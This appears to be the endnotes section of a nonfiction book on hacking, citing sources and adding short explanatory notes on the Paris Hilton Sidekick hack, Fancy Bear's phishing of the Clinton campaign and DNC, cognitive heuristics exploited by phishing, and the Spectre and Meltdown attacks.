“literally hundreds of injection vulnerabilities”: Paul Roberts, “Paris Hilton: Victim of T-Mobile’s Web Flaws?,” Ethical Hacking and Computer Forensics (blog), PCWorld, March 1, 2005, www.pcworld.com/article/119851/article.html.
inaccessible to the general public: Another of Krebs’s sources, Kelly Hallissey, who had befriended the hacking group of which Cameron was a member, confirmed that the teenager had indeed been the perpetrator. Brian Krebs, “Paris Hilton Hack Started with Old-Fashioned Con,” The Washington Post, May 19, 2005.
“Hip Hop Debs”: Nancy Jo Sales, “Hip Hop Debs,” Vanity Fair, September 1, 2000.
“Paris had a charisma”: Keaton Bell, “Paris Hilton on Her Revealing New Documentary: ‘I’m Not a Dumb Blonde. I’m Just Really Good at Pretending to Be One,’” Vogue, September 16, 2020, www.vogue.com/article/paris-hilton-talks-about-her-new-documentary.
huge ratings: Lisa de Moraes,“‘Simple Life,’ the Overalled Winner,” The Washington Post, September 5, 2003.
without a valid license: Steve Gorman, “Paris Hilton Sentenced to 45 days in Jail,” Reuters, May 4, 2007, https://www.reuters.com/article/us-hilton/paris-hilton-sentenced-to-45-days-in-jail-idUSN0339694420070505.
Confessions: Paris Hilton, Confessions of an Heiress: A Tongue-in-Chic Peek Behind the Pose (New York: Touchstone, 2006).
“Everything I’ve done”: 06afeher, “Paris, Not France,” YouTube, https://www.youtube.com/watch?v=zeV_59Lz5fk at 33:46.
Cameron was born: Telephone interview with Cameron LaCroix, March 18, 2022. (First interview with CL).
The representatives usually reset the password: Christopher Null, “Hackers Run Wild and Free on AOL,” Wired, February 21, 2003, www.wired.com/2003/02/hackers-run-wild-and-free-on-aol.
“I always had the feeling”: Kim Zetter, “Database Hackers Reveal Tactics,” Wired, May 25, 2005, www.wired.com/2005/05/database-hackers-reveal-tactics.
Cameron sent an email: “Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers and Making Bomb Threats to High Schools in Massachusetts and Florida,” U.S. Department of Justice, September 8, 2005, www.justice.gov/archive/criminal/cybercrime/press-releases/2005/juvenileSentboston.htm.
The email read: According to Cameron, his friend wrote the email. First interview with CL.
larger-scale intrusions: Zetter, “Database Hackers Reveal.”
Snoop Dogg is standing: T-Mobile, “Paris Hilton-T-Mobile-Fabric Softener,” AdForum Talent, uploaded by Publicis Seattle, January 1, 2005, www.adforum.com/talent/62231-paris-hilton/work/46280.
Hackers are information junkies: Hackers are well-known for “dumpster diving,” searching through dumpsters or trash cans for information. See, e.g., Elizabeth Montalbano, “Hackers Dumpster Dive for Taxpayer Data in COVID-19 Relief Money Scams,” Threatpost, May 7, 2020, https://threatpost.com/hackers-dumpster-dive-covid-19-relief-scams/155537/. See also Michele Slatalla and Joshua Quittner, Masters of Deception: The Gang That Ruled Cyberspace (New York: Harper Perennial, 1995).
security information over the phone: Krebs, “Paris Hilton Hack Started.”
generous with session tokens: “Paris Hilton’s Phonebook Hacked, Posted Online (+ How It Could Have Been Done),” Rootsecure.Net, June 26, 2010, web.archive.org/web/20100626030043/http://www.rootsecure.
net/?p=reports/paris_hilton_phonebook_hacked.
“a ticket on an ocean liner”: Scott Granneman, “How Shall I Own Your Mobile Phone Today?,” The Register, March 25, 2005, www.theregister.com/2005/03/25/mobile_phone_security.
messaging for multiple platforms: Jason Duaine Hahn, “The History of the Sidekick: The Coolest Smartphone of All Time,” Complex, September 22, 2020, www.complex.com/pop-culture/2015/09/history-of-the-sidekick.
high-tech jewelry: Hahn, “History of the Sidekick.”
stolen credit card information: First interview with CL.
mobile operating system market: Richard Shim, “Danger Tests Update to Device OS,” CNET, September 24, 2003, www.cnet.com/news/danger-tests-update-to-device-os.
“Web applications”: Krebs, “Paris Hilton Hack Started.”
Long Creek Youth Development Center: Telephone interview with Cameron LaCroix, September 26, 2022. (Second interview with CL.)
two years in prison: Commonwealth v. Cameron LaCroix, Defendant, Social Law Library, web.archive.org/web/20110716101406/http://www.sociallaw.com/
slip.htm?cid=18798&sid=121.
fourteen thousand people: “Massachusetts Man Charged with Computer Hacking and Credit Card Theft,” U.S. Department of Justice, September 16, 2014, www.justice.gov/opa/pr/massachusetts-man-charged-computer-hacking-and-credit-card-theft.
“Just got sold to”: Dashiell Bennett, “Burger King’s Twitter Account Got Seriously Hacked,” The Atlantic, October 30, 2013, www.theatlantic.com/business/archive/2013/02/burger-kings-unfortunate-twitter-hack/318246.
sold to Cadillac: “Recidivist Hacker Sentenced for Violating Supervised Release,” U.S. Department of Justice, September 16, 2019, www.justice.gov/usao-ma/pr/recidivist-hacker-sentenced-violating-supervised-release-conditions.
Cameron expressed remorse: Milton J. Valencia, “Apologetic New Bedford Hacker Gets 4-Year Jail Sentence,” The Boston Globe, October 28, 2014, www.bostonglobe.com/metro/2014/10/27/new-bedford-computer-hacker-sentenced-years-federal-prison/XwXxwL0TGGfiLk9QimRQiM/story.html.
suggested by the guidelines: Transcript, Case 1:14-cr-10162-MLW, Document 53, Filed September 2, 2019, 9.
the Today show: NBC, “‘Paris, I’m Sorry,’ Says Cameron LaCroix: A Super-Hacker Interview,” YouTube, uploaded by z plus tv, November 6, 2014, www.youtube.com/watch?v=sggPiw43WCA.
he wrote in a public letter: Stephanie Merry, “Matt Lauer Breaks Silence: ‘To the People I Have Hurt, I Am Truly Sorry,’” The Washington Post, November 30, 2017.
he had two more to go: Transcript, Case 1:14-cr-10162-MLW.
Bill Barr announced: Attorney General William Barr, “Memorandum for the Director of Bureau Prisons,” March 26, 2020, https://www.bop.gov/coronavirus/docs/bop_memo_home_confinement.pdf; Ian MacDougall, “Bill Barr Promised to Release Prisoners Threatened by Coronavirus—Even as the Feds Secretly Made It Harder for Them to Get Out,” ProPublica, May 26, 2020, https://www.propublica.org/article/bill-barr-promised-to-release-prisoners-threatened-by-coronavirus-even-as-the-feds-secretly-made-it-harder-for-them-to-get-out.
managed to contact him: Second interview with CL.
to grant him access: US v. Cameron LaCroix, Defendant’s Assented-to Motion to Modify Conditions of Supervised Release, August 15, 2017.
Packingham v. North Carolina: Packingham v. North Carolina, 137 S. Ct. 1730 (2017).
His picture: See https://www.blueuprising.org/our-team.
As he awoke in his hotel: William Bastone, “Tracking the Hackers Who Hit DNC, Clinton,” The Smoking Gun, August 12, 2016, https://www.thesmokinggun.com/documents/investigation/
tracking-russian-hackers-638295.
Glavnoye Razvedyvatelnoye Upravlenie: Usually translated as the Organization of the Main Intelligence Administration.
a red banner: Eric Lipton, David E. Sanger, and Scott Shane, “The Perfect Weapon: How Russian Cyberpower Invaded the United States,” The New York Times, December 13, 2016.
six out of ten targets: Secureworks Counter Threat Unit, “Threat Group-4127 Targets Hillary Clinton Presidential Campaign,” Secureworks, June 26, 2016, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign. “CTU researchers identified … 26 personal gmail.com accounts belonging to individuals linked to the Hillary for America campaign, the DNC, or other aspects of U.S. national politics. TG-4127 created 150 short links targeting this group … As of this publication, 40 of the links have been clicked at least once.” Secureworks Counter Threat Unit, “Threat Group-4127 Targets Hillary Clinton Google Accounts,” Secureworks, June 16, 2016, https://www.secureworks.com/research/threat-group-4127-targets-google-accounts.
phishing: For a history of phishing, as told through research abstracts about phishing, see Ana Ferreira and Pedro Vieira-Marques, “Phishing Through Time: A Ten Year Story Based on Abstracts,” Proceedings of the 4th International Conference on Information Systems Security and Privacy 1 (2018): 225–32.
Linda is thirty-one years old: A. Tversky and D. Kahneman, “Judgments of and by Representativeness,” in Judgment under Uncertainty: Heuristics and Biases, ed. D. Kahneman, P. Slovic, and A. Tversky (Cambridge: Cambridge University Press, 1982); A. Tversky and D. Kahneman, “Extensional versus Intuitive Reasoning: The Conjunction Fallacy in Probability Judgment,” Psychological Review 90 (1983): 4; cf. Gerd Gigerenzer, “On Narrow Norms and Vague Heuristics: A Reply to Kahneman and Tversky.” Psychological Review 103 (1996): 592–96.
born into a family: A. Tversky and D. Kahneman, “Subjective Probability: A Judgment of Representativeness,” in Kahneman, et al., Judgment under Uncertainty, 34.
Representativeness Heuristic: “A person who follows this heuristic evaluates the probability of an uncertain event, or a sample, by the degree to which it is: (i) similar in essential characteristics to its parent population; and (ii) reflects the salient features of the process by which it is generated”: Tversky and Kahneman, “Subjective Probability,” 33.
legitimate Gmail security alert: See example at https://github.com/anitab-org/mentorship-backend/issues/233.
fraudulent and dangerous: Emma J. Williams and Danielle Polage, “How Persuasive Is Phishing Email? The Role of Authentic Design, Influence and Current Events in Email Judgements,” Behavior & Information Technology 38, no. 2 (2019): 184–97.
John Mulaney: Video clip at https://www.youtube.com/watch?v=ButlizwQXnU.
sent the email: ThreatConnect Research Team, “Does a Bear Leak in the Woods,” ThreatConnect Insights (blog), August 12, 2016, https://threatconnect.com/blog/does-a-bear-leak-in-the-woods/.
put any email address: While basic email protocols allow for spoofing, there are additional protocols—such as Sender policy framework (SPF), Domain Keys identified mail (DKIM), and Domain-based message authentication, reporting, and conformance (DMARC)—that can help email providers considerably reduce spoofing. See Scott Rose et al., “Trustworthy Email,” NIST Special Publication 800-177, September 2016, https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-177.pdf.
Google domain name: Because of trademark disputes, some users in the U.K. and Germany have googlemail email addresses. See Andy B, “Change to Gmail from Google Mail,” July 21, 2016, https://support.google.com/mail/forum/
AAAAK7un8RUvxxPMMv5kXg/?hl=en&gpf=%23!topic%2Fgmail%2FvxxPMMv5kXg%3Bcontext-place%3Dforum%2Fgmail.
“word starts with a K”: Amos Tversky and Daniel Kahneman, “Availability: A Heuristic for Judging Frequency and Probability,” Cognitive Psychology 5 (1973): 211.
Availability Heuristic: In another Kahneman and Tversky experiment, participants listened to lists of names containing either nineteen famous women and twenty less famous men or nineteen famous men and twenty less famous women. Participants were then asked to estimate whether male or female names were more frequent on the list. The majority of the participants chose the wrong answer. In the first list, they judged the nineteen famous women as more frequent, whereas in the second list they judged the nineteen famous men as more frequent. The participants seemed to have linked frequency of gender to availability in memory, where availability in memory was more closely linked to the fame of the people listed. Tversky and Kahneman, “Availability,” 220–21.
two dozen legislators: Rafael Satter, Jeff Donn, and Justin Myers, “Russian Hackers Pursued Putin Foes, Not Just US Democrats,” November 2, 2017, https://apnews.com/3bca5267d4544508bb523fa0db462cb2/Hit-list-exposes-Russian-hacking-beyond-US-elections.
The Wall Street Journal: Margaret Coker and Paul Sonne, “Ukraine: Cyberwar’s Hottest Front,” The Wall Street Journal, November 9, 2015.
natural disasters and infectious diseases: Phil Muncaster, “#COVID19 Drives Phishing Emails Up 667% in Under a Month,” March 26, 2020, InfoSecurity Magazine, https://www.infosecurity-magazine.com/news/covid19-drive-phishing-emails-667/.
Affect Heuristic: Paul Slovic, Melissa L. Finucane, Ellen Peters, and Donald G. MacGregor, “The Affect Heuristic,” European Journal of Operational Research 177 (2007): 1333–52.
downplay its benefits: The Affect Heuristic works partially through the Availability Heuristic. The more you like something, the more likely its benefits will be available to you in memory. Conversely, the more available an event is in memory, the greater the affect experienced. For the relation between these two heuristics, see Thorsten Pachur et al., “How Do People Judge Risks: Availability Heuristic, Affect Heuristic, or Both?,” Journal of Experimental Psychology: Applied 18, no. 3 (2012): 314–30.
an urn: Dale T. Miller, William Turnbull, and Cathy McFarland, “When a Coincidence Is Suspicious: The Role of Mental Simulation,” Journal of Personality and Social Psychology 57 (1989): 581–89; Lee A. Kirkpatrick and Seymour Epstein, “Cognitive-Experiential Self-Theory and Subjective Probability: Evidence for Two Conceptual Systems,” Journal of Personality and Social Psychology 63 (1992): 534–44; Daniel Kahneman, Thinking, Fast and Slow (New York: Farrar, Straus and Giroux, 2011), 328–29.
“inversely correlated”: A. S. Alhakami and P. Slovic, “A Psychological Study of the Inverse Relationship between Perceived Risk and Perceived Benefit,” Risk Analysis 14 (1994): 1085–96.
time pressure: Melissa L. Finucane, Ali Alhakami, Paul Slovic, and Stephen M. Johnson, “The Affect Heuristic in Judgments of Risks and Benefits,” Journal of Behavioral Decision Making 13 (2000): 5.
Nigerian Astronaut: Katharine Trendacosta, “Here’s the Best Nigerian Prince Email Scam in the Galaxy,” Gizmodo, February 12, 2016, https://gizmodo.com/we-found-the-best-nigerian-prince-email-scam-in-the-gal-1758786973.
“loss averse”: Amos Tversky and Daniel Kahneman, “Loss Aversion in Riskless Choice: A Reference-Dependent Model,” The Quarterly Journal of Economics, November 1991. Jack and Jill example from Kahneman, Thinking, Fast and Slow, 275.
promise gains: Teodor Sommestad and Henrik Karlzén, “A Meta-Analysis of Field Experiments on Phishing Susceptibility” (2019 APWG Symposium on Electronic Crime Research [eCrime]).
inherent ridiculousness: Cormac Herley, “Why Do Nigerian Scammers Say They Are from Nigeria?,” Microsoft, www.microsoft.com/en-us/research/wp-content/uploads/2016/02/WhyFromNigeria.pdf.
Billy Rinehart clicked: Another factor that should be mentioned is that legitimate websites constantly train people to click on links in emails for security reasons.
approximately 10 percent for IT: Flexera 2022 State of Tech Spend Pulse Report, https://info.flexera.com/FLX1-REPORT-State-of-Tech-Spend.
24 percent of that on security: Hiscox Cyber Readiness Report 2022, https://www.hiscox.com/documents/Hiscox-Cyber-Readiness-Report-2022.pdf.
Our browsers couldn’t care less: The human reliance on visual clues in recognition is so pronounced that it is the main way in which CAPTCHA detects bots. CAPTCHA is a reverse Turing Test. Instead of a computer trying to convince a human that it’s a human, CAPTCHA makes the human convince the computer that it’s a human. Computers identify humans by measuring the accuracy of their visual identification skills.
parent company of Google: Security certificates are difficult to forge because they are digitally signed by the holder and the certification authority.
vouch for the identities: Some certification authorities, such as Let’s Encrypt, merely attest that the holder of the certificate controls, rather than owns, the website in question. Nor do they verify identity.
bankruptcy later in the week: For an excellent description and analysis of the DigiNotar hack, see Josephine Wolff, You’ll See This Message When It Is Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (Cambridge, MA: MIT Press, 2018), 81–100.
HTTP pages are “not secure”: Christopher Boyd, “Chrome Casts Away the Padlock—Is It Good Riddance or Farewell?,” MalwareBytes Labs, August 4, 2021, https://blog.malwarebytes.com/privacy-2/2021/08/chrome-casts-away-the-padlock-is-it-good-riddance-or-farewell/.
not “accounts-google”: “In mid-2015, CTU researchers discovered TG-4127 using the accoounts-google.com domain in spear-phishing attacks targeting Google Account users. The domain was used in a phishing URL submitted to Phishtank, a website that allows users to report phishing links”: https://www.secureworks.com/research/threat-group-4127-targets-google-accounts.
a real password-reset page: Cloning a web page is extremely simple. Your browser has the web page file, and therefore all the information needed to re-create the page. Some free utilities on the web, such as HTTrack, allow users to download a website from the internet to a local directory and recursively build all directories on their local computer.
prefilled web form: The URL also contained Billy Rinehart’s email address and username encoded in a format known as Base 64. Thus, when accoounts-google.com sent the request to the fake website, the resulting web page would present a form already completed with the user’s information: https://climateaudit.org/2018/03/24/attribution-of-2015–6-phishing-to-apt28/. Base 64 converts three octet (eight-bit) characters into four Base 64 (six-bit) ones. For example, to encode the English word Man in Base 64, we take the ASCII value of M (77), a (97), and n (110). We then convert the decimal values to binary and join them together: 01001101 01100001 01101110. If we group this binary sequence according to six bits, instead of eight bits, we get 010011 010110 000101 101110. Converting back to decimal, we get 19, 22, 5, and 46. Treating them as ASCII values, we get T, W, F, and u. Thus, TWFu is the Base 64 encoding of Man.
Turing’s physicality principle: “According to my definition, a number is computable if its decimal can be written down by a machine.” Alan Turing, “On Computable Numbers with an Application to the Entscheidungproblem,” Proceedings of the London Mathematical Society, 1936, 230.
compute the correct answer: Here’s a simple example. Suppose you wanted to know whether a string of numbers has three 1s in it. Feed a tape with the string into your Turing Machine. The machine begins in state 0 with its head over the left end of the tape. It scans the square. If it finds a 1, it moves the head to the right and switches to state 1. If it doesn’t, it moves right and stays in state 0. If the head scans another 1, it moves right again and enters state 2; otherwise, it moves right and stays in state 1. If the head scans another 1, it prints Y, enters the final state, and halts. Otherwise, the head continues scanning for a third 1. If the head hits the right end of the tape before finding it, it prints N, enters the final state, and halts.
before it is needed: Speculative execution attacks are a subset of side-channel attacks that exploit our desire for efficiency in computing and decision-making more generally. Imagine parents and children debating how to spend their Saturday. If the parents wake up before the kids, they could spend some time looking at movies playing at the local theater. Later, they ask the kids if they’d like to see one. The kids say yes, and the parents can act on the information they gathered previously. So long as the parents are good at predicting what their kids will choose, they can save time on average. The same is true of speculative execution in CPUs. So long as the CPU’s predictions of future branch instructions are reasonably accurate, it will be more efficient to act on that instruction before confirming that it occurs. Speculative execution attacks work by tricking the CPU into gathering sensitive information before the operating system appreciates the nature of this information. Trick the CPU, and it will access memory containing sensitive passwords, which can then be extracted by malicious hackers. Two speculative execution attacks are particularly notable: 1) SPECTRE: Computers store sensitive information in protected memory addresses. SPECTRE functions by prompting the CPU to speculatively execute on protected memory. During the speculation, the CPU copies the contents of this memory stored in RAM to the cache on the CPU. Storing on the cache boosts efficiency, since accessing the cache is much faster than accessing RAM, like going to your refrigerator for food instead of the store. Once the operating system realizes that the CPU has accessed sensitive information during the speculative execution, it will block access to the information. However, the information remains copied on the cache. Hackers can use timing attacks to deduce the contents of the cache. (The food is still in the refrigerator even though you stole it from the store.) Paul Kocher et al., “SPECTRE Attacks: Exploiting Speculative Execution,” 40th IEEE Symposium on Security and Privacy (2019); 2) MELTDOWN: MELTDOWN functions similarly to SPECTRE; it maliciously transfers secret content to the cache and uses side-channel attacks to deduce the content. While SPECTRE exploits branch prediction to copy sensitive information into the cache, MELTDOWN takes advantage of the fact that some CPUs will check two pieces of information simultaneously: a) the contents of a memory address, and b) the permissions related to that memory address. In other words, the CPU will ask permission to read a certain piece information as it is reading that piece of information. Of course, once the computer realizes the information is sensitive, it will prevent the hacker from accessing it. However, this sensitive information has already been copied to the cache. From there, hackers can use side-channel attacks to deduce its contents. Unlike SPECTRE, MELTDOWN is able to access kernel memory, allowing it in theory to read the entire contents of a computer (meltdown refers to the erasing of the borders between protected and unprotected memory). Moritz Lipp et al., “MELTDOWN: Reading Kernel Memory from User Space,” 27th USENIX Security Symposium 18 (2018).
to conserve resources: “Almost any optimization that you can think of that makes your best case run a litte faster, leaves the worst case the same, leaves some kind of side channel in between.” Paul Kocher, “Spectre Attacks: Exploiting Speculative Execution,” 40th IEEE Symposium on Security and Privacy (2019), https://www.youtube.com/watch?v=zOvBHxMjNls at 2:12.
high-value: For the difficulties of securing a political campaign, see Sunny Consolvo et al., “‘Why Wouldn’t Someone Think of Democracy as a Target?’: Security Practices and Challenges of People Involved with U.S. Political Campaigns,” Proceedings of the USENIX Security Symposium (2021).
Three days before Fancy Bear phished: United States of America v. Viktor Borisovich Netykshov, Boris Alekseyevich Antonov, Dmitriy Sergeyevich Badin, Ivan Sergeyevich Yermakov, Aleksey Viktorovich Lukashev, Sergey Aleksandrovich Morgachev, Nikolay Yuryevich Kozachek, Pavel Vyacheslavovich Yershov, Artem Andreyevich Malyshev, Aleksandr Vladimirovich Osadchuk, Aleksey Aleksandrovich Potemkin, and Anatoliy Sergeyevich Kovalev, Defendants, Case 1:18-cr-00215-ABJ, July 13, 2018, 6, https://www.justice.gov/file/1080281/download.
Charles Delavan: Charles Delavan, “Re: Someone Has Your Password—March 19, 2016,” WikiLeaks, https://web.archive.org/web/20220122033133/https://wikileaks.
org/podesta-emails/emailid/36355.
fifty thousand emails in all: United States of America v. Defendants, 6.
In his defense: Eric Lipton, David E. Sanger, and Scott Shane, “The Perfect Weapon: How Russian Cyberpower Invaded the U.S.,” The New York Times, December 13, 2016.
Delavan responded in Slate: Will Oremus, “‘Is This Something That’s Going to Haunt Me the Rest of My Life?’: What It’s Like to Be the IT Guy Who Accidentally Helped Russia (Maybe) Hack the Election,” Slate, December 14, 2016, https://slate.com/technology/2016/12/an-interview-with-charles-delavan-the-it-guy-whose-typo-led-to-the-podesta-email-hack.html.
Dmitri Alperovitch, co-founder: Vicky Ward, “The Russian Émigré Leading the Fight to Protect America,” Esquire, December 1, 2016, https://www.esquire.com/news-politics/a49902/the-russian-emigre-leading-the-fight-to-protect-america.
SNAKEMACKEREL: AccentureSecurity, “SNAKEMACKEREL: Threat Campaign Likely Targeting NATO Members, Defense and Military Outlets,” Accenture, 2019, https://www.accenture.com/_acnmedia/pdf-94/accenture-snakemackerel-threat-campaign-likely-targeting-nato-members-defense-and-military-outlets.pdf. Saying which firm is responsible for which name can be tricky. First, since hacking groups are discovered independently, firms may lack the evidence to conclude that they are talking about the same group. Second, given the churn in the industry over the past decade, the names of the firms have changed. Thus, APT 28 appears to have been the name given by FireEye (which is now Trellix). FireEye had owned Mandiant, but as of last year they are separate again. APT 28 is now identified with Mandiant.
“badass guys who act”: Aton Troianovski and Ellen Nakashima, “How Russia’s Military Intervention Became the Covert Muscle in Putin’s Duels with the West,” The Washington Post, December 28, 2018.
brazen poisoning of Sergei Skripal: Richard Pérez-Peña and Ellen Barry, “U.K. Charges 2 Men in Novichok Poisoning, Saying They’re Russian Agents,” The New York Times, September 5, 2018.
“My father died”: “Chief Scout Reports,” Rossiyskaya Gazeta, Moscow, December 20, 2005, https://web.archive.org/web/20070325133406/http://svr.gov.ru/
smi/2005/rosgaz20051220.htm.
“We saw that the FSB”: Roland Oliphant, “What Is Unit 26165, Russia’s Elite Military Hacking Centre?,” The Telegraph, October 4, 2018.
future in computer hacking: Unit 26165 has helped design the curriculum at Nina Loguntsova’s school and at least six others in Moscow in recent years, as “cooperation agreements” posted on the schools’ websites show: Troianovski and Nakashima, “How Russia’s Military Intervention.”
“problems with the law”: “What Is the GRU?” Meduza, November 6, 2018, https://meduza.io/en/feature/2018/11/06/what-is-the-gru-who-gets-recruited-to-be-a-spy-why-are-they-exposed-so-often.
southwest of the Kremlin: Oddly, Unit 26165 can be found under that address in the online Unified State Register of Legal Entities, https://www.rusprofile.ru/egrul?ogrn=1097746760836.
Kill Chain: Eric M. Hutchins, Michael J. Cloppert, and Rohan M. Amin, “Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains,” Lockheed Martin Corporation, https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf. The terminology used in the text fits the Varonis model most closely: Sarah Hospelhorn, “What Is the Cyber Kill Chain and How to Use It Effectively,” Varonis, https://www.varonis.com/blog/cyber-kill-chain/. For an alternative model, see “ATT&CK for Enterprise Introduction,” Mitre, https://attack.mitre.org/tactics/enterprise/.
“speaking indictment”: Unfortunately, the evidence gathered by Mueller and presented to a grand jury in Washington, DC, to substantiate these allegations has been redacted due to its highly classified nature.
Fancy Bear prepared: United States of America v. Defendants, 4–6.
The twenty-five-year-old: “Aleksey Viktorovich Lukashev,” Most Wanted, FBI, https://www.fbi.gov/wanted/cyber/aleksey-viktorovich-lukashev.
From publicly available: Secureworks Counter Threat Unit, “Threat Group–4127 Targets Hillary Clinton Presidential Campaign,” Secureworks, June 11, 2016, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign.
On the morning of: Raphael Satter, Jeff Donn, and Chad Day, “Inside Story: How Russians Hacked the Democrats’ Emails,” AP News, November 4, 2017, https://apnews.com/article/hillary-clinton-phishing-moscow-russia-only-on-ap-dea73efc01594839957c3c9a6c962b8a.
He inserted the newly: United States of America v. Defendants, 13. The account had been registered with dirbinsaabol@mail.com.
The test must have: Raphael Satter (@razhael), “Now Look at March 10, 2016,” Twitter, July 13, 2018, https://twitter.com/razhael/status/1017897983558455297.
Nevertheless: Terry Sweeney, “Clinton Campaign Tested Staffers with Fake Phishing Emails,” Dark Reading, February 15, 2017, https://www.darkreading.com/attacks-breaches/clinton-campaign-tested-staffers-with-fake-phishing-emails/d/d-id/1328177.
Lukashev tried again four days later: Raphael Satter (@razhael), “Skip Forward to March 15, 2016,” Twitter, July 13, 2018, https://twitter.com/razhael/status/1017900690633523200.
Yermakov, a thirty-year-old, baby-faced hacker: “Ivan Sergeyevich Yermakov,” Most Wanted, FBI, https://www.fbi.gov/wanted/cyber/ivan-sergeyevich-yermakov.
Yermakov’s tasks were: United States of America v. Defendants, 8.
On March 19: Raphael Satter (@razhael), “Lets Go Now to March 19, 2016,” Twitter, July 13, 2018.
The shortened URL: Satter, Donn, and Day, “Inside Story.”
These emails targeted: Satter, Donn, and Day, “Inside Story.”
The next day, Yermakov scanned: United States of America v. Defendants, 8.
On April 15: United States of America v. Defendants, 10.
Mudge, a well-known hacker: Peiter “Mudge” Zatko (@dotmudge), “So … I Suppose It’s Time to Share a Bit,” Twitter, July 14, 2018, https://twitter.com/dotMudge/status/1017949169619595264. On Mudge, see Joseph Menn, Cult of the Dead Cow (New York: Public Affairs: 2019); Kim Zetter, “A Famed Hacker Is Grading Thousands of Programs—and May Revolutionize Software in the Process,” The Intercept, July 29, 2016, https://theintercept.com/2016/07/29/a-famed-hacker-is-grading-thousands-of-programs-and-may-revolutionize-software-in-the-process/.
At Fancy Bear, reconnaissance: United States of America v. Defendants, 7.
Lieutenant Colonel: United States of America v. Defendants, 4.
is a cross-platform: Tiberius Axinte and Bogdan Botezatu, “A Post-Mortem Analysis of Trojan.MAC.APT28-XAgent,” in Bitdefender: Dissecting the APT28 Mac OS X Payload, 2015, https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf.
Lieutenant Captain Nikolay Kozachek: United States of America v. Defendants, 4.
He included his handle: In the project path: Users/kazak/Desktop/Project/XAgentOSX. Axinte and Botezatu, “Post-Mortem Analysis,” 6.
Second Lieutenant Artem Malyshev: United States of America v. Defendants, 5, 8–9.
To mask the traffic: United States of America v. Defendants, 9–10. On April 19 and 20, 2016.
from someone who accepts: Bitcoin is not legal tender (yet), so no one is obligated to accept it.
On March 22: “Rebooting Watergate: Tapping into the Democratic National Committee,” ThreatConnect, Intelligence-Driven Security Operations, June 17, 2016, https://web.archive.org/web/20221001000000*/https://threatconnect.com/blog/tapping-into-democratic-national-committee/.
in the domain name: MIS stands for Management Information Systems.
On April 22: “Interview of Shawn Henry,” Interview by Executive Session, Permanent Select Committee on Intelligence, U.S. House of Representatives, Washington, DC, December 5, 2017, 32, https://intelligence.house.gov/uploadedfiles/sh21.pdf.
Four days later: Mikayla Bouchard and Emily Cochrane, “How We Got Here: A Timeline of Events Leading Up to the Charges,” The New York Times, October 30, 2017.
Supreme Court ruled unanimously: United States v. U.S. District Court, 407 U.S. 297 (1972), commonly known as the “Keith” case, after the presiding District Court judge.
On Friday, September 25: “CrowdStrike’s Work with the Democratic National Committee: Setting the Record Straight,” From the Front Lines, CrowdStrike, June 5, 2020, https://www.CrowdStrike.com/blog/bears-midst-intrusion-democratic-national-committee/.
He asked for the computer security department: “Interview of Yared Tamene Wolde-Yohannes,” Interview by Executive Session, Permanent Select Committee on Intelligence, U.S. House of Representatives, Washington, DC, August 30, 2017, 7, https://www.odni.gov/files/HPSCI_Transcripts/Yareda_Tamene-MTR_Redacted.pdf.
not a security specialist: Hawkins identified himself to Tamene as an FBI agent. Tamene asked for verification, but was unconvinced by the response. Lipton, Sanger, and Shane, “Perfect Weapon.”
Hawkins didn’t inform Tamene: “Interview of Yared Tamene Wolde-Yohannes,” 8.
The FBI had been aware: “CrowdStrike’s Work with the Democratic National Committee.”
“exquisite access”: Raphael Satter and Mike Corder, “Dutch Spies Caught Russian Hackers on Tape,” January 26, 2018, apnews.com/article/hacking-elections-international-news-security-services-technology-ef3b036949174a9b98d785129a93428.
Hawkins divulged little: “Interview of Yared Tamene Wolde-Yohannes,” 8. Hawkins added that Tamene should do the investigation stealthily, so as not to tip off the hackers about their suspicions.
“The FBI thinks”: Lipton, Sanger, and Shane, “Perfect Weapon.”
nothing about it: Lipton, Sanger, and Shane, “Perfect Weapon.”
After the conversation with Hawkins: “Interview of Yared Tamene Wolde-Yohannes,” 8–9.
He described his initial threat level: “Interview of Yared Tamene Wolde-Yohannes,” 11.
“And I took every call”: “Interview of Yared Tamene Wolde-Yohannes,” 12. Tamene clarified that sometimes he did not return Hawkins’s voice mails because Hawkins always called back. “So I actually never got a situation where—I think I might have gotten some missed calls from him, but I never called him myself directly. And that wasn’t me trying to be coy or anything like that. It was simply a matter of timing. And so, if I missed his call, he would call back and I would talk to him,” 14.
could not verify it: In December, Tamene requested budgetary approval to buy a more sophisticated firewall to see if he could catch the traffic that the FBI was seeing. He ordered the firewall from Palo Alto Networks in part because of their article he had read about the Dukes. The firewall was installed in February and turned on in March. “Interview of Yared Tamene Wolde-Yohannes,” 13.
When Hawkins and Tamene finally met: “Interview of Yared Tamene Wolde-Yohannes,” 17.
After securing legal clearance: “Interview of Yared Tamene Wolde-Yohannes,” 22.
The metadata was sent over on April 29: “Interview of Yared Tamene Wolde-Yohannes,” 23.
On April 28: “Interview of Yared Tamene Wolde-Yohannes,” 24.
“We’ve had an intrusion”: Greg Miller, The Apprentice: Trump, Russia, and the Subversion of American Democracy, 43 (New York: Custom House, 2018).
“The security of our system is critical”: Ellen Nakashima, “Russian Government Hackers Penetrated DNC, Stole Opposition Research on Trump,” The Washington Post, June 14, 2016.
Even when CrowdStrike had confirmed: “Interview of Shawn Henry,” 26.
the Democratic Party: The DNC’s delay was costly. Between May 25 and June 1, Fancy Bear hacked the DNC corporate server and stole thousands of emails: United States of America v. Defendants, 11.
basic details: Edward Snowden, Permanent Record (New York: Farrar, Straus and Giroux, 2019).
Snowden files: See generally Barton Gellman, Dark Mirrors: Edward Snowden and the American Surveillance State (New York: Penguin Press, 2021).
states are permitted: See, e.g., Asaf Lubin, “The Liberty to Spy,” Harvard International Law Journal 61 (2020): 185.
Angela Merkel’s cell phone: “German Magazine: NSA Spied on United Nations,” CBS News, August 26, 2013, https://www.cbsnews.com/news/german-magazine-nsa-spied-on-united-nations/.
